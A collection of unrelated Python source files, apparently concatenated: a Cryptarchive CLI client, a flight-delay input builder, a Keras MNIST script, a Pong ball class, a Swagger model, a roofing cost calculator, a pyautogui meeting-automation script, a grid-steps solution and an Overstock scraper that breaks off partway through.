"""entry point for the console client."""
parser = argparse.ArgumentParser(description="The Cryptarchive commandline client")
parser.add_argument("-v", "--verbose", action="store_true", help="be more verbose")
parser.add_argument("host", action="store", help="host to connect to")
parser.add_argument("-p", "--port", action="store", type=int, default=constants.DEFAULT_PORT, help="port to connect to")
parser.add_argument("--nohash", action="store_false", dest="hash_password", help="Do not hash password")
parser.add_argument("username", action="store", help="username")
parser.add_argument("password", action="store", help="password")
parser.add_argument("action", action="store", choices=["ls", "mkdir", "show-index", "upload", "download", "delete", "download-raw", "mv"], help="what to do")
parser.add_argument("orgpath", action="store", help="path to read from / list / create / ...")
parser.add_argument("dest", action="store", help="path to write to", nargs="?", default=None)
parser.add_argument("-c", "--client", action="store", choices=["tx", "socket"], default="tx")
ns = parser.parse_args()
if ns.verbose:
log.startLogging(sys.stdout)
client_class = CLIENTS[ns.client]
client = client_class(
host=ns.host,
port=ns.port,
username=ns.username,
password=ns.password,
hash_password=ns.hash_password,
)
if ns.client == "tx":
task.react(run_tx_client, (client, ns))
elif ns.client == "socket":
run_socket_client(client, ns)
else:
raise ValueError("Unexpected value for -c/--client")
@inlineCallbacks
def run_tx_client(reactor, client, ns):
"""runs the twisted client."""
if ns.action != "download-raw":
yield client.retrieve_index()
if ns.action == "ls":
content = yield client.listdir(ns.orgpath)
for fn in content:
print fn
elif ns.action == "mkdir":
yield client.mkdir(ns.orgpath)
elif ns.action == "show-index":
pprint.pprint(client._index._index)
elif ns.action == "upload":
if os.path.isdir(ns.orgpath):
dtc, ftu = scan_dir_for_upload(ns.orgpath, ns.dest)
else:
dtc = []
ftu = [(ns.orgpath, ns.dest)]
for dn in dtc:
yield client.mkdir(dn)
for lp, rp in ftu:
with open(lp, "rb") as fin:
print("Uploading '{o}' as '{d}'...".format(o=lp, d=rp))
yield client.upload(fin, rp)
elif ns.action == "download":
if client._index.dir_exists(ns.orgpath):
dtc, ftu = scan_dir_for_download(client._index, ns.orgpath, ns.dest)
else:
dtc = []
ftu = [(ns.orgpath, ns.dest)]
for dn in dtc:
if not os.path.exists(dn):
os.mkdir(dn)
for rp, lp in ftu:
with open(lp, "wb") as fout:
print("Downloading '{r}' as '{l}'...".format(r=rp, l=lp))
yield client.download(rp, fout)
elif ns.action == "download-raw":
with open(ns.dest, "wb") as fout:
yield client.download_raw(ns.orgpath, fout)
elif ns.action == "delete":
yield client.delete(ns.orgpath)
elif ns.action == "mv":
yield client.move(ns.orgpath, ns.dest)
def run_socket_client(client, ns):
"""runs the socket client."""
if ns.action != "download-raw":
client.retrieve_index()
if ns.action == "ls":
content = client.listdir(ns.orgpath)
for fn in content:
print fn
elif ns.action == "mkdir":
client.mkdir(ns.orgpath)
elif ns.action == "show-index":
pprint.pprint(client._index._index)
elif ns.action == "upload":
if os.path.isdir(ns.orgpath):
dtc, ftu = scan_dir_for_upload(ns.orgpath, ns.dest)
else:
dtc = []
ftu = [(ns.orgpath, ns.dest)]
for dn in dtc:
client.mkdir(dn)
for lp, rp in ftu:
with open(lp, "rb") as fin:
print("Uploading '{o}' as '{d}'...".format(o=lp, d=rp))
client.upload(fin, rp)
elif ns.action == "download":
if client._index.dir_exists(ns.orgpath):
dtc, ftu = scan_dir_for_download(client._index, ns.orgpath, ns.dest)
else:
dtc = []
ftu = [(ns.orgpath, ns.dest)]
for dn in dtc:
if not os.path.exists(dn):
os.mkdir(dn)
for rp, lp in ftu:
with open(lp, "wb") as fout:
print("Downloading '{r}' as '{l}'...".format(r=rp, l=lp))
client.download(rp, fout)
elif ns.action == "download-raw":
with open(ns.dest, "wb") as fout:
client.download_raw(ns.orgpath, fout)
elif ns.action == "delete":
client.delete(ns.orgpath)
elif ns.action == "mv":
client.move(ns.orgpath, ns.dest)
|
from datetime import datetime
from flight_delay_prediction.constant import CATEGORICAL_INPUTS, CONTINUOUS_INPUTS, AIRPORTS, INPUT_NAMES, TEMPERATURES, \
PRECIPITATION, VISIBILITY, WINDSPEED
from flight_delay_prediction.errors import *
from flight_delay_prediction.resources_loader import Resources
from flight_delay_prediction.weather.weather_api import WeatherAPI
from flight_delay_prediction.utils import get_minutes_timedelta
from flight_delay_prediction.weather.weather_caching import WeatherPool
class ModelInputBuilder:
"""
Params need to contain values for keys:
carrier_code, origin_airport, destination_airport, origin_dt, destination_dt
"""
def __init__(self, params, mock_weather=False):
if not params.keys() == {'carrier_code',
'origin_airport', 'destination_airport',
'origin_dt', 'destination_dt'}:
raise WrongRequestParameters()
self.inputs = {}
self.params = params
self.mock_weather = mock_weather
self.set_categorical()
self.set_continuous()
def get_weather(self):
weather = {}
weather_origin = self._access_weather(self.params['origin_airport'],
self.params['origin_dt'],
AIRPORTS['origin'])
weather.update(weather_origin)
weather_destination = self._access_weather(self.params['destination_airport'],
self.params['destination_dt'],
AIRPORTS['destination'])
weather.update(weather_destination)
return weather
def _access_weather(self, iata_code, dt, location):
if self.mock_weather:
return {TEMPERATURES[location]: 67, PRECIPITATION[location]: 0,
VISIBILITY[location]: 9, WINDSPEED[location]: 16}
weather = WeatherPool.get_weather(iata_code, dt, location)
return weather
def set_categorical(self):
categorical = {'carrier_code': self.params['carrier_code'],
'origin_airport': self.params['origin_airport'],
'destination_airport': self.params['destination_airport'],
'day': str(datetime.strptime(self.params['origin_dt'], WeatherAPI.datetime_format).day),
'month': str(datetime.strptime(self.params['origin_dt'], WeatherAPI.datetime_format).month),
'weekday': str(
datetime.strptime(self.params['origin_dt'], WeatherAPI.datetime_format).weekday())}
self.inputs.update(categorical)
assert categorical.keys() == set(CATEGORICAL_INPUTS)
def set_continuous(self):
continuous = self.get_weather()
# set number of seconds from midnight
departure = datetime.strptime(self.params['origin_dt'], WeatherAPI.datetime_format)
departure = (departure - datetime(departure.year, departure.month, departure.day)).seconds // 60
continuous['scheduled_departure_dt'] = departure
# set in air time of flight
continuous['scheduled_elapsed_time'] = get_minutes_timedelta(
Resources.airport_codes[self.inputs['origin_airport']],
Resources.airport_codes[self.inputs['destination_airport']],
datetime.strptime(self.params['origin_dt'], WeatherAPI.datetime_format),
datetime.strptime(self.params['destination_dt'], WeatherAPI.datetime_format)
)
self.inputs.update(continuous)
assert continuous.keys() == set(CONTINUOUS_INPUTS)
def _is_valid(self):
return self.inputs.keys() == INPUT_NAMES
def build(self):
if self._is_valid():
return self.inputs
raise IncompleteModelInputError(f'{self.inputs.keys() - INPUT_NAMES}'
f'inputs are missing from ModelInputBuilder')
|
import numpy as np
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Dropout, Flatten
from keras.layers.normalization import BatchNormalization
from keras.layers import Conv2D, MaxPooling2D
from keras.utils import np_utils
from keras import backend as K
"""Odmah po importu se izvrsi ovo sve sto je u telu"""
# da je np.random.seed(0) uvek bi random davao iste brojeve...
np.random.seed(1)
numberEpochs = 10
numberOutput = 10
n_classes = 10
def data_preparation(X_train, Y_train, X_test, Y_test):
width = X_train[0].shape[0]
height = X_train[0].shape[1]
# br. ulaznih pod.
X_train = X_train.reshape(X_train.shape[0], height, width, 1) # mozda ce se menjati nacin reshape-a
X_test = X_test.reshape(X_test.shape[0], height, width, 1)
# X_train = X_train.reshape(X_train.shape[0], 784) # mozda ce se menjati nacin reshape-a
# X_test = X_test.reshape(X_test.shape[0], 784)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train = X_train / 255
X_test = X_test / 255
Y_train = np_utils.to_categorical(Y_train, n_classes) # binarna matricna reprezentacija
Y_test = np_utils.to_categorical(Y_test, n_classes)
return (X_train, Y_train), (X_test, Y_test)
(x_train, y_train), (x_test, y_test) = mnist.load_data()
width = x_train[0].shape[0]
height = x_train[0].shape[1]
(x_train, y_train), (x_test, y_test) = data_preparation(x_train, y_train, x_test, y_test)
def add_layers(model, shape):
# prvi sloj
model.add(Conv2D(filters=32, kernel_size=(3, 3), input_shape=shape))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2), strides=2))
# drugi sloj
# model.add(Conv2D(filters=16, kernel_size=(3, 3)))
model.add(Conv2D(filters=16, kernel_size=(3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25)) # Dropout consists in randomly setting a fraction rate of input units to 0 at each
# update during training time, which helps prevent overfitting
model.add(Flatten()) # "zaravniti", Flattens the input. Does not affect the batch size.
# model.add(Dense(output_dim=128))
# novije
model.add(Dense(units=128))
model.add(Activation('relu'))
model.add(Dense(units=64))
model.add(Activation('relu'))
# izlazni sloj...
model.add(Dense(numberOutput))
model.add(Activation('softmax'))
return model
def add_layers_medium(model, shape):
# prvi sloj
model.add(Conv2D(filters=32, kernel_size=(3, 3), padding='same',
input_shape=shape))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(filters=64, kernel_size=(3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(filters=64, kernel_size=(3, 3), padding='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
# Densely connected layers
model.add(Dense(128))
model.add(Activation('relu'))
# izlazni sloj...
model.add(Dense(numberOutput))
model.add(Activation('softmax'))
return model
# predugo [losi acc i losss....]
def add_layers_kaggle(model, shape):
# prvi sloj
model.add(Conv2D(32, kernel_size=(3, 3), kernel_initializer='he_normal', input_shape=shape))
model.add(Activation('relu'))
model.add(Conv2D(32, kernel_size=(3, 3), kernel_initializer='he_normal'))
model.add(Activation('relu'))
model.add(MaxPooling2D((2, 2)))
model.add(Dropout(0.20))
model.add(Conv2D(64, (3, 3), padding='same', kernel_initializer='he_normal'))
model.add(Activation('relu'))
model.add(Conv2D(64, (3, 3), padding='same', kernel_initializer='he_normal'))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(128, (3, 3), padding='same', kernel_initializer='he_normal'))
model.add(Activation('relu'))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128))
model.add(Activation('relu'))
model.add(BatchNormalization())
# izlazni sloj...
model.add(Dense(numberOutput))
model.add(Activation('softmax'))
return model
def init_method():
# "channels_last"(default) assumes (rows, cols, channels) while "channels_first" assumes (channels, rows, cols)
# if K.image_data_format() == 'channels_first':
# shape = (1, sirina, visina)
# else:
# shape = (sirina, visina, 1)
# shape = (1, width, height)
shape = (width, height, 1) # default channels_last
model = Sequential()
model = add_layers(model, shape)
print(model.summary()) # toString modela....
return model
def get_model():
model = init_method()
model.load_weights("neural_network.h5")
return model
def train_model():
model = init_method()
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
# train set, labele...
model.fit(x_train, y_train, batch_size=128, epochs=numberEpochs, validation_data=(x_test, y_test))
rez = model.evaluate(x_test, y_test, verbose=1)
print("Accuracy: %.2f%%" % (rez[1] * 100))
model.save_weights("neural_network.h5")
return model
# laksa nm
# (X_train, y_train), (X_test, y_test) = mnist.load_data()
# building the input vector from the 28x28 pixels
# X_train = X_train.reshape(60000, 784)
# X_test = X_test.reshape(10000, 784)
# X_train = X_train.astype('float32')
# X_test = X_test.astype('float32')
#
# # normalizing the data to help with the training
# X_train /= 255
# X_test /= 255
#
# n_classes = 10
# Y_train = np_utils.to_categorical(y_train, n_classes)
# Y_test = np_utils.to_categorical(y_test, n_classes)
# building a linear stack of layers with the sequential model
# model = Sequential()
# model.add(Dense(512, input_shape=(784,), activation="relu"))
# # model.add(Activation('relu'))
# model.add(Dropout(0.2))
#
# model.add(Dense(512, activation="relu"))
# model.add(Activation('relu'))
# model.add(Dropout(0.2))
#
# model.add(Dense(512))
# model.add(Activation('relu'))
# model.add(Dropout(0.2))
#
# model.add(Dense(10))
# model.add(Activation('softmax'))
#
# model.compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='adam')
#
# # training the model and saving metrics in history
# history = model.fit(x_train, x_train,
# batch_size=128, epochs=10,
# verbose=2,
# validation_data=(x_test, y_test))
#
# model.save('model.h5')
|
#!/usr/bin/python
"""Ball used in pong"""
import pygame
from event import Event
import math
import random
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
BALL_BORDER = 1 # Width of the border around the ball
MAX_HORIZONTAL_VELOCITY = 6
MAX_VERTICAL_VELOCITY = 4
class Ball(pygame.sprite.DirtySprite):
"""Ball used for Pong"""
def __init__(self, position, paddles, velocity, surface, playarea):
#call the parent class init
"""
:param position: Pygame Rect describing the ball
:param paddles: Reference to the paddles for collision checking
:param velocity: Initial velocity of the ball
:param surface: pygame surface
:param playarea: area within the surface used for gameplay
"""
pygame.sprite.DirtySprite.__init__(self)
self.image = pygame.Surface([position.width, position.height])
self.image.fill(BLACK)
white_center = pygame.Rect(
(BALL_BORDER, BALL_BORDER, position.width - 2 * BALL_BORDER,
position.height - 2 * BALL_BORDER))
self.image.fill(WHITE, white_center)
self.rect = self.image.get_rect()
self.rect.top = position.top
self.rect.left = position.left
self.dirty = 2 # ball is always moving
self.paddles = paddles
self.surface = surface
self._initial_velocity = list(velocity)
self.velocity = list(velocity)
self.point_scored = Event()
self.left_paddle_intercept = Event()
self.right_paddle_intercept = Event()
self.need_updated_intercept_position = True
self.playarea = pygame.Rect(playarea)
self.top_bottom_offset = \
(self.surface.get_height() - self.playarea.height) / 2
self.left_right_offset = \
(self.surface.get_width() - self.playarea.width) / 2
self.force_score_side = "none"
self.paddle_track_to = [0, 0]
@property
def initial_velocity(self):
return self._initial_velocity
@initial_velocity.setter
def initial_velocity(self, value):
assert isinstance(value, list)
self._initial_velocity = value
def force_score(self, side):
"""forces the ball to score a point
:param side: the side that will be forced to allow a score
"""
sides = ['left', 'right', 'none']
if not side in sides:
raise ValueError("The side passed in, {}, is not valid".format(side))
self.force_score_side = side
def update_intercept_location(self):
""" Converts the velocity and location to an intercept location. """
self.need_updated_intercept_position = False
# we convert to int because that's how the ball moves across the screen.
# This prevents scenarios where the ratio is 3.9/2.0 which causes the
# angle returned to be inaccurate and results in missed balls
angle_b = math.degrees(math.atan(math.fabs(int(self.velocity[1])) /
math.fabs(int(self.velocity[0]))))
# print(self.velocity)
angle_c = 180 - (90 + angle_b)
left = False
if self.velocity[0] < 0: # Heading left (origin is 0)
distance_c = self.rect.left - self.left_right_offset
left = True
else:
# - self.left_right_offset is already included in the play_area
distance_c = self.playarea.width + self.left_right_offset - \
(self.rect.left + self.rect.width)
#distance_c = self.play_area.width - self._rect.left
down = False
if self.velocity[1] > 0:
down = True
height = (distance_c * math.sin(math.radians(angle_b))) / math.sin(math.radians(angle_c))
#height += self._rect[3] / 2
if down is True:
height = self.rect.centery + height
else:
height = self.rect.centery - height
# Here we check to see if self.force_score = none. If it is 'left'
# or 'right' we fudge the intercept position to hopefully miss.
if left is True:
#if self.force_score_side == "left": height += miss_value
self.left_paddle_intercept(height)
self.paddle_track_to[0] = height
#print 'projected left exit location ' + str(height)
else:
#if self.force_score_side == "right": height += miss_value
self.right_paddle_intercept(height)
self.paddle_track_to[1] = height
#print 'projected right exit location ' + str(height)
def update(self, surface, original_background):
"""
update is provided for DirtySprite
:param surface:
:param original_background:
:return:
"""
t_position = pygame.Rect((self.rect.left + self.velocity[0],
self.rect.top + self.velocity[1],
self.rect.width, self.rect.height))
# Check collision with paddles
for paddle in self.paddles:
if t_position.colliderect(paddle.rect) == 1: # Collision occurred
# print('collision - velocity in = ', self.velocity)
paddle_deflection = paddle.get_deflection_value(self.rect.centery)
assert isinstance(paddle_deflection, int)
if math.fabs(self.velocity[1] + paddle_deflection) \
< MAX_VERTICAL_VELOCITY:
self.velocity[1] += paddle_deflection
if math.fabs(self.velocity[0] * -1.05) < MAX_HORIZONTAL_VELOCITY:
self.velocity[0] *= -1.05
else:
self.velocity[0] *= -1
self.need_updated_intercept_position = True
# Move and return
self.rect.move_ip(self.velocity)
self.surface.blit(original_background, (0, 0))
return
# check for top and bottom bounce
if t_position.top < 0 + self.top_bottom_offset:
self.velocity[1] *= -1.0
self.need_updated_intercept_position = True
# bottom edge bounce
elif t_position.bottom > self.surface.get_height() - self.top_bottom_offset:
self.velocity[1] *= -1.0
self.need_updated_intercept_position = True
#Check to see if we score
elif t_position.right > self.surface.get_width(): # score
#increase score for left player
self.rect.top = (self.surface.get_height()/2)
self.rect.left = (self.surface.get_width()/2)
#set the new velocity to a random between initial and max
self.velocity[0] = random.randint(self._initial_velocity[0], MAX_HORIZONTAL_VELOCITY)
self.velocity[1] = random.randint(self._initial_velocity[1], MAX_VERTICAL_VELOCITY)
self.velocity[0] *= -1.0 # change direction
self.need_updated_intercept_position = True
self.point_scored('left')
self.force_score_side = 'none'
#print 'balls track to ', self.paddle_track_to, self.rect.centery
#return
elif t_position.left < 0:
#new ball
self.rect.top = (self.surface.get_height()/2)
self.rect.left = (self.surface.get_width()/2)
#set the new velocity to a random between initial and max
self.velocity[0] = random.randint(self._initial_velocity[0], MAX_HORIZONTAL_VELOCITY)
self.velocity[1] = random.randint(self._initial_velocity[1], MAX_VERTICAL_VELOCITY)
#self.velocity[0] *= -1 #change direction
#print 'right player score - ball exited at: ' + str(t_position.top)
self.point_scored('right')
self.force_score_side = 'none'
self.need_updated_intercept_position = True
#print 'balls track to ', self.paddle_track_to, self.rect.centery
#return
#move using the new velocity
self.rect.move_ip(self.velocity)
self.surface.blit(original_background, (0, 0))
if self.need_updated_intercept_position is True:
self.update_intercept_location()
|
# coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
import re
class RemotesupportConnectemcConnectemc(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
RemotesupportConnectemcConnectemc - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'email_customer_on_failure': 'bool',
'enabled': 'bool',
'primary_esrs_gateway': 'str',
'remote_support_subnet': 'str',
'secondary_esrs_gateway': 'str',
'use_smtp_failover': 'bool'
}
self.attribute_map = {
'email_customer_on_failure': 'email_customer_on_failure',
'enabled': 'enabled',
'primary_esrs_gateway': 'primary_esrs_gateway',
'remote_support_subnet': 'remote_support_subnet',
'secondary_esrs_gateway': 'secondary_esrs_gateway',
'use_smtp_failover': 'use_smtp_failover'
}
self._email_customer_on_failure = None
self._enabled = None
self._primary_esrs_gateway = None
self._remote_support_subnet = None
self._secondary_esrs_gateway = None
self._use_smtp_failover = None
@property
def email_customer_on_failure(self):
"""
Gets the email_customer_on_failure of this RemotesupportConnectemcConnectemc.
Email the customer if all trasmission methods fail.
:return: The email_customer_on_failure of this RemotesupportConnectemcConnectemc.
:rtype: bool
"""
return self._email_customer_on_failure
@email_customer_on_failure.setter
def email_customer_on_failure(self, email_customer_on_failure):
"""
Sets the email_customer_on_failure of this RemotesupportConnectemcConnectemc.
Email the customer if all trasmission methods fail.
:param email_customer_on_failure: The email_customer_on_failure of this RemotesupportConnectemcConnectemc.
:type: bool
"""
self._email_customer_on_failure = email_customer_on_failure
@property
def enabled(self):
"""
Gets the enabled of this RemotesupportConnectemcConnectemc.
Enable ConnectEMC.
:return: The enabled of this RemotesupportConnectemcConnectemc.
:rtype: bool
"""
return self._enabled
@enabled.setter
def enabled(self, enabled):
"""
Sets the enabled of this RemotesupportConnectemcConnectemc.
Enable ConnectEMC.
:param enabled: The enabled of this RemotesupportConnectemcConnectemc.
:type: bool
"""
self._enabled = enabled
@property
def primary_esrs_gateway(self):
"""
Gets the primary_esrs_gateway of this RemotesupportConnectemcConnectemc.
Primary ESRS Gateway. Necessary to enable ConnectEMC.
:return: The primary_esrs_gateway of this RemotesupportConnectemcConnectemc.
:rtype: str
"""
return self._primary_esrs_gateway
@primary_esrs_gateway.setter
def primary_esrs_gateway(self, primary_esrs_gateway):
"""
Sets the primary_esrs_gateway of this RemotesupportConnectemcConnectemc.
Primary ESRS Gateway. Necessary to enable ConnectEMC.
:param primary_esrs_gateway: The primary_esrs_gateway of this RemotesupportConnectemcConnectemc.
:type: str
"""
self._primary_esrs_gateway = primary_esrs_gateway
@property
def remote_support_subnet(self):
"""
Gets the remote_support_subnet of this RemotesupportConnectemcConnectemc.
Network subnet to use for remote support. Necessary to enable ConnectEMC.
:return: The remote_support_subnet of this RemotesupportConnectemcConnectemc.
:rtype: str
"""
return self._remote_support_subnet
@remote_support_subnet.setter
def remote_support_subnet(self, remote_support_subnet):
"""
Sets the remote_support_subnet of this RemotesupportConnectemcConnectemc.
Network subnet to use for remote support. Necessary to enable ConnectEMC.
:param remote_support_subnet: The remote_support_subnet of this RemotesupportConnectemcConnectemc.
:type: str
"""
self._remote_support_subnet = remote_support_subnet
@property
def secondary_esrs_gateway(self):
"""
Gets the secondary_esrs_gateway of this RemotesupportConnectemcConnectemc.
Secondary ESRS Gateway. Used if Primary is unavailable.
:return: The secondary_esrs_gateway of this RemotesupportConnectemcConnectemc.
:rtype: str
"""
return self._secondary_esrs_gateway
@secondary_esrs_gateway.setter
def secondary_esrs_gateway(self, secondary_esrs_gateway):
"""
Sets the secondary_esrs_gateway of this RemotesupportConnectemcConnectemc.
Secondary ESRS Gateway. Used if Primary is unavailable.
:param secondary_esrs_gateway: The secondary_esrs_gateway of this RemotesupportConnectemcConnectemc.
:type: str
"""
self._secondary_esrs_gateway = secondary_esrs_gateway
@property
def use_smtp_failover(self):
"""
Gets the use_smtp_failover of this RemotesupportConnectemcConnectemc.
Use SMPT if primary and secondary gateways are unavailable.
:return: The use_smtp_failover of this RemotesupportConnectemcConnectemc.
:rtype: bool
"""
return self._use_smtp_failover
@use_smtp_failover.setter
def use_smtp_failover(self, use_smtp_failover):
"""
Sets the use_smtp_failover of this RemotesupportConnectemcConnectemc.
Use SMPT if primary and secondary gateways are unavailable.
:param use_smtp_failover: The use_smtp_failover of this RemotesupportConnectemcConnectemc.
:type: bool
"""
self._use_smtp_failover = use_smtp_failover
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
import pandas
def install_cost_solar(area: float) -> int:
"""
Calculates the average cost of installing solar panels over a given area
Info:
1 Panel is 17.55 square feet, 1.63 m^2
6 kW system requires 20 panels, 32.6 m^2
$2.78 per Watt
$512 per m^2
:param area: Area to be covered in solar panels, in meters squared
:return: Average cost of installing solar panels for given area, in CAD
"""
return int(512 * int(area))
def install_cost_green(area: float) -> int:
"""
Calculates the average cost of installing a green roof over a given area
Info:
$240 per m^2
:param area: Area to be covered, in meters squared
:return: Average cost of installing a green roof for given area, in CAD
"""
return int(240 * int(area))
def create_cost_df(area_series: pandas.Series) -> pandas.DataFrame:
"""
Creates a pandas DataFrame of the cost of solar and green roofing for given area series
:param area_series: Pandas series with roof areas
:return: Pandas DataFrame with columns ['SOLAR_COST', 'GREEN_COST']
"""
count = int()
size = area_series.shape[0]
print('Generating area costs: ')
cost = []
for area in area_series:
print(count/size * 100, '%')
cost.append((install_cost_solar(area), install_cost_green(area)))
count += 1
cost_df = pandas.DataFrame(cost, columns=['SOLAR_COST', 'GREEN_COST'])
return cost_df
if __name__ == "__main__":
massing_df = pandas.read_csv('DataSets/3DMassing_2018_WGS84_fixed.csv')
# cost = []
# for item in massing_df['SHAPE_AREA']:
# cost.append(install_cost_solar(item))
# massing_df['SOLAR_COST'] = pandas.Series(cost)
costdf = create_cost_df(massing_df['SHAPE_AREA'])
massing_df['SOLAR_COST'] = costdf['SOLAR_COST']
massing_df['GREEN_COST'] = costdf['GREEN_COST']
print(massing_df)
|
import pyautogui as pag
import time
import csv
def enter_meeting():
pag.click(282, 459) # at khub
time.sleep(4)
pag.hotkey("ctrl", "e")
time.sleep(0.5)
pag.hotkey("ctrl", "d")
time.sleep(1)
pag.click(992, 427) # join at meet
time.sleep(2)
def start_record():
pag.click(1338, 675) # three buttons
time.sleep(0.5)
pag.click(1210, 238) # record button
time.sleep(0.5)
pag.click(929, 483) # accept consent
time.sleep(10)
def stop_record():
pag.click(1338, 675) # three buttons
time.sleep(1)
pag.click(1210, 238) # record button
time.sleep(1)
pag.click(797, 466) # stop recording
time.sleep(1)
def leave_meeting():
pag.click(682, 685) # accept send to sir emman
time.sleep(1)
pag.hotkey("ctrl", "w")
time.sleep(1)
def chat(_names):
pag.click(1127, 89) # click chat
time.sleep(1)
for i in range(2, 48):
pag.write("Magandang buhay!")
pag.hotkey("shift", "enter")
pag.write(_names[i])
time.sleep(0.1)
pag.press("enter")
time.sleep(0.1)
pag.click(1337, 102) # close chat
time.sleep(1)
with open("Files/p6.csv") as sfile:
cread = csv.reader(sfile, delimiter=",")
names = [row[1] for row in cread]
time.sleep(1)
print(pag.position())
for i in range(1):
enter_meeting()
start_record()
chat(names)
stop_record()
leave_meeting()
|
class Solution:
# @param X : list of integers
# @param Y : list of integers
# Points are represented by (X[i], Y[i])
# @return an integer
def coverPoints(self, X, Y):
steps = 0
row, col = X[0], Y[0]
for i in range(1, len(X)):
steps += max(abs(row - X[i]), abs(col - Y[i]))
row, col = X[i], Y[i]
return steps
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# encoding=utf8
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import requests
from bs4 import BeautifulSoup, SoupStrainer
import Tkinter
from lxml import html
import openpyxl
from time import sleep
def center(toplevel):
toplevel.update_idletasks()
w = toplevel.winfo_screenwidth()
h = toplevel.winfo_screenheight()
size = tuple(int(_) for _ in toplevel.geometry().split('+')[0].split('x'))
x = w/2 - size[0]/2
y = h/2 - size[1]/2
toplevel.geometry("%dx%d+%d+%d" % (size + (x, y)))
class simpleapp_tk(Tkinter.Tk):
def __init__(self,parent):
Tkinter.Tk.__init__(self,parent)
self.parent = parent
self.initialize()
def initialize(self):
self.grid()
self.entryVariable = Tkinter.StringVar()
self.entry = Tkinter.Entry(self,textvariable=self.entryVariable)
self.entry.grid(column=0,row=0,sticky='EW', padx=10, pady=10)
self.entry.bind("<Return>", self.OnPressEnter)
self.entryVariable2 = Tkinter.StringVar()
self.entry2 = Tkinter.Entry(self,textvariable=self.entryVariable2)
self.entry2.grid(column=0,row=1,sticky='EW', padx=10, pady=0)
self.entry2.bind("<Return>", self.OnPressEnter)
self.entryVariable.set(u"Enter Url here.")
self.entryVariable2.set(u"Enter File name here.")
button = Tkinter.Button(self,text=u"Scrape !",
command=self.OnButtonClick)
button.grid(column=1,row=0, padx=10, pady=10)
self.labelVariable = Tkinter.StringVar()
label = Tkinter.Label(self,textvariable=self.labelVariable,
anchor="w",fg="white",bg="blue", padx=10, pady=10)
label.grid(column=0,row=2,columnspan=2,sticky='EW', padx=10, pady=10)
self.labelVariable.set(u"Hello Qman55!")
self.grid_columnconfigure(0,weight=1)
self.resizable(True,False)
self.update()
self.geometry(self.geometry())
self.entry.focus_set()
self.entry.selection_range(0, Tkinter.END)
def OnButtonClick(self):
url = self.entryVariable.get()
bookname = self.entryVariable2.get()
self.labelVariable.set(u"Please wait while the bot scrapes ...")
this(url, bookname)
self.labelVariable.set(u"Finished!")
sleep(10)
exit()
self.entry.focus_set()
self.entry.selection_range(0, Tkinter.END)
def OnPressEnter(self,event):
self.labelVariable.set( self.entryVariable.get()+" (You pressed ENTER)" )
self.entry.focus_set()
self.entry.selection_range(0, Tkinter.END)
def gh(url):
all_products = []
prod_pages = []
prod_pages.append(url)
for page_num in range(1):
try:
# go get a url
print(url)
response = requests.get(url)
soup = BeautifulSoup(response.content, 'html.parser')
#pprint(soup)
#"product-wrapper tile-view"
products = soup.find_all('a', {"class": "product-link"})
#print(products)
# GET INDIVIDUAL href from product div tag
counter = 0
for product in products:
if counter < 4 :
all_products.append(product['href'])
counter += 1
# GET INDIVIDUAL href from product div tag
# for product in products:
# all_products.append(product['href'])
# find the next-page button href
elem = soup.find("a", {"class": "next"})
# it becomes the new url
url = (elem['href'])
except Exception as e:
#print(all_products)
#raise e
break
print(str(len(all_products))+ " Total Products of this search...")
print
print("'The scraper is now getting info of individual searched products and saving them to your workbook'")
print
return all_products
def this(url, xl):
print
print("'This scraper mines custom search product info from https://www.overstock.com'")
print("'Please use a file name that doesnot contain spaces, no special characters and please be case sensitive'")
print
if not ".xlsx" in xl:
xl = str(xl) + '.xlsx'
else:
pass
book = openpyxl.Workbook()
active_sheet = book.active
active_sheet.title = "overstock"
rowNum = 1
heads = ['Title', 'Price1', 'Price2', 'Shipping', 'Return', 'Category', 'Reviews', 'Review Average', 'Low Quantity',
'OOS', 'New Arrival', 'Clearance', 'Top Seller', 'Exclusive', 'Special', 'Weekly Deals', 'Variations', 'Rewards',
'Link']
for colNum in range(1, 20):
val = heads[colNum-1]
